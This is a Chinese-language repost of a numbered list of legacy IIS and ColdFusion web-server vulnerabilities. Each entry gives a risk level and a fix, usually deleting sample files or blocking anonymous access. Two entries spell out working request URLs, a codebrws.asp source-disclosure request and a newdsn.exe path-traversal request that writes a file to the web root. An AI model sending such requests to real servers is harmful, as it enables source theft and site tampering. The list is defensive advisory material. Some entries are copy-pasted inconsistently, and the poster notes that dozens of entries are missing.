_____________________________________________________________________________________
66
類型: 攻擊型
名字: ism.dll
風險等級: 高
描述: 在/scripts/iisadmin/目錄下存在ism.dll文件,這個文件有一個溢出錯誤,允許入侵者在服務器上執行任意一段程序;另外。攻擊者還隨時可以令服務器的www服務死掉
建議: 禁止對/scripts目錄的匿名訪問
解決方法: 刪除/scripts/iisadmin/ism.dll, 或者打開iis的管理控制台,選取默認web站點,點右鍵,選取屬性,點:"主目錄",在起始點那行點"配置"按鈕,將".htr"的應用程序映射項刪除
___________________________________________________________________________________________
67
類型: 信息型
名字: codebrws.asp_2
風險等級: 中
描述: 在/iissamples/sdk/asp/docs/下面存在codebrws.asp文件,用下面的路徑:
http://www.xxx.com/iissamples/exair/howitworks/codebrws.asp?source=/index.asp就可以查看到index.asp的源碼。實際上任何ascii文件都可以瀏覽。
建議: 刪除名叫/iissamples/的web目錄
解決方法: 將在您Web目錄中的codebrws.asp刪除或移走
請前往以下地址查詢補丁
Internet Information Server:
ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
Site Server:
ftp://ftp.microsoft.com/bussys/sitesrv/sitesrv-public/fixes/usa/siteserver3/hotfixes-postsp2/Viewcode-fix/
http://www.microsoft.com/security/products/iis/checklist.asp
相關連接: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/
______________________________________________________________________________________
68
類型: 攻擊型
名字: uploadn.asp
風險等級: 高
描述: 在/scripts/tools目錄下存在uploadn.asp程序,只要入侵者有一個可用帳號,哪怕是Guest帳號,就可以上傳任何文件到你的web目錄,除了替換主頁外,他更可以進一步控制你的整個系統!
建議: 刪除名為/scripts的web目錄
解決方法: 刪除uploadn.asp文件
相關連接:
____________________________________________________________________________________
69
類型: 攻擊型
名字: uploadx.asp
風險等級: 高
描述: 在/scripts/tools目錄下存在uploadx.asp程序,只要入侵者有一個可用帳號,哪怕是Guest帳號,就可以上傳任何文件到你的web目錄,除了替換主頁外,他更可以進一步控制你的整個系統!
建議: 刪除名為/scripts的web目錄
解決方法: 刪除uploadx.asp文件
相關連接:
______________________________________________________________________________________
70
類型: 攻擊型
名字: query.asp
風險等級: 低
描述: 在/IISSAMPLES/ExAir/Search/的目錄下存在query.asp文件,這個文件有個漏洞如果被攻擊者利用,果將導致CPU使用率達到100%,機器速度將明顯變慢
建議: 禁止對/iissamples目錄的存取
解決方法: 刪除query.asp文件
_______________________________________________________________________________
71
類型: 攻擊型
名字: advsearch.asp
風險等級: 低
描述: 在/IISSAMPLES/ExAir/Search/的目錄下存在query.asp文件,這個文件有個漏洞如果被攻擊者利用,果將導致CPU使用率達到100%,機器速度將明顯變慢
建議: 禁止對/iissamples目錄的存取
解決方法: 刪除advsearch.asp文件
_______________________________________________________________________________
72
類型: 攻擊型
名字: search.asp
風險等級: 低
描述: 在/IISSAMPLES/ExAir/Search/的目錄下存在search.asp文件,這個文件有個漏洞如果被攻擊者利用,果將導致CPU使用率達到100%,機器速度將明顯變慢
建議: 禁止對/iissamples目錄的存取
解決方法: 刪除search.asp文件
_________________________________________________________________________________
74
類型: 攻擊型
名字: getdrvrs.exe
風險等級: 中
描述: 這個存在/scripts/tools目錄下的getdrvrs.exe文件允許任何一個用戶在web根目錄下創建任何文件,和創建ODBC數據源
建議: 禁止對/scripts/tools目錄的匿名訪問
解決方法: 刪除getdrvrs.exe文件
_______________________________________________________________________________
73
類型: 攻擊型
名字: newdsn.exe
風險等級: 中
描述: 這個存在/scripts/tools目錄下的newdsn.exe文件允許任何一個用戶在web根目錄下創建任何文件,如:
http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
建議: 禁止對/scripts/tools目錄的匿名訪問
解決方法: 刪除newdsn.exe文件
_______________________________________________________________________________
75
類型: 信息型
名字: showcode.asp_3
風險等級: 中
描述: 在/iissamples/exair/howitworks/存在code.asp文件,入侵者利用該文件可以查看服務器硬盤上任何一個ASCII文件的內容,並顯示asp程序文件的源代碼
建議: 禁止對/iissamples的web目錄的匿名訪問
解決方法: 刪除showcode.asp文件
_________________________________________________________________________________
76
類型: 攻擊型
名字: aexp.htr
風險等級: 中
描述: 在/iisadmpwd目錄下存在aexp.htr文件,類似的還有aexp2.htr,aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破解和修改NT用戶的密碼。
建議: 建議禁止對/iisadmpwd目錄的訪問
解決方法: 刪除aexp.htr文件
____________________________________________________________________________________
77
類型: 攻擊型
名字: aexp2.htr
風險等級: 中
描述: 在/iisadmpwd目錄下存在aexp2.htr文件,類似的還有aexp2.htr,aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破解和修改NT用戶的密碼。
建議: 建議禁止對/iisadmpwd目錄的訪問
解決方法: 刪除aexp2.htr文件
_______________________________________________________________________________________
78
類型: 攻擊型
名字: aexp3.htr
風險等級: 中
描述: 在/iisadmpwd目錄下存在aexp3.htr文件,類似的還有aexp2.htr,aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破解和修改NT用戶的密碼。
建議: 建議禁止對/iisadmpwd目錄的訪問
解決方法: 刪除aexp3.htr文件
_________________________________________________________________________________________
79
類型: 攻擊型
名字: aexp4b.htr
風險等級: 中
描述: 在/iisadmpwd目錄下存在aexp4b.htr文件,類似的還有aexp2.htr,aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破解和修改NT用戶的密碼。
建議: 建議禁止對/iisadmpwd目錄的訪問
解決方法: 刪除aexp4b.htr文件
____________________________________________________________________________________
80
類型: 攻擊型
名字: achg.htr
風險等級: 中
描述: 在/iisadmpwd目錄下存在aechg.htr文件,類似的還有aexp2.htr,aexp3.htr和aexp4b.htr等,這些文件允許攻擊者用窮舉法等方式破解和修改NT用戶的密碼。
建議: 建議禁止對/iisadmpwd目錄的訪問
解決方法: 刪除achg.htr文件
____________________________________________________________________________________
81
類型: 攻擊型
名字: ExprCale.cfm
風險等級: 中
描述: 在Coldfusion的web目錄: /cfdocs/expeval/ExprCalc.cfm文件,這個文件有個漏洞允許用戶讀取服務器硬盤上的任意文件包括用戶密碼數據庫sam文件
建議: 刪除相關的文件
解決方法: 刪除ExprCalc.cfm文件
_______________________________________________________________________________________
82
類型: 攻擊型
名字: getfile.cfm
風險等級: 中
描述: 在Coldfusion的web目錄: /getfile.cfm文件,這個文件有個漏洞允許用戶讀取服務器硬盤上的任意文件包括用戶密碼數據庫sam文件
建議: 刪除相關的文件
解決方法: 刪除getfile.cfm文件
_______________________________________________________________________________
119
類型: 信息型
名字: x.htw
風險等級: 中
描述: IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用Index Server的點擊功能的。盡管你不運行Index Server,該映射仍然有效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文件,數據庫文件,和ASP源代碼。
建議:
建議在IIS控制台中刪除無用的應用程序映射
________________________________________________________________________________
120
類型: 信息型
名字: qfullhit.htw
風險等級: 中
描述: IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用Index Server的點擊功能的。盡管你不運行Index Server,該映射仍然有效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文件,數據庫文件,和ASP源代碼。
建議: 建議在IIS控制台中刪除無用的應用程序映射
____________________________________________________________________________________
121
類型: 信息型
名字: iirturnh.htw
風險等級: 中
描述: IIS4.0上有一個應用程序映射htw--->webhits.dll,這是用Index Server的點擊功能的。盡管你不運行Index Server,該映射仍然有效。這個應用程序映射存在漏洞,允許入侵者讀取本地硬盤上的文件,數據庫文件,和ASP源代碼。
建議: 建議在IIS控制台中刪除無用的應用程序映射
相信認真看的朋友會看到,在序號82處,漏了幾十條信息..那也是沒辦法,不是我的問題,我拿到這份資料時就是這樣了...不知道是因為那幾十條漏洞信息比較有破壞性還是什原因。。請有識之士補全 :)
(http://www.fanqiang.com)
進入【UNIX論壇】
|
|
| 相關文章 |
|
====== |
|
|
|
★ 樊強制作 歡迎分享 ★ |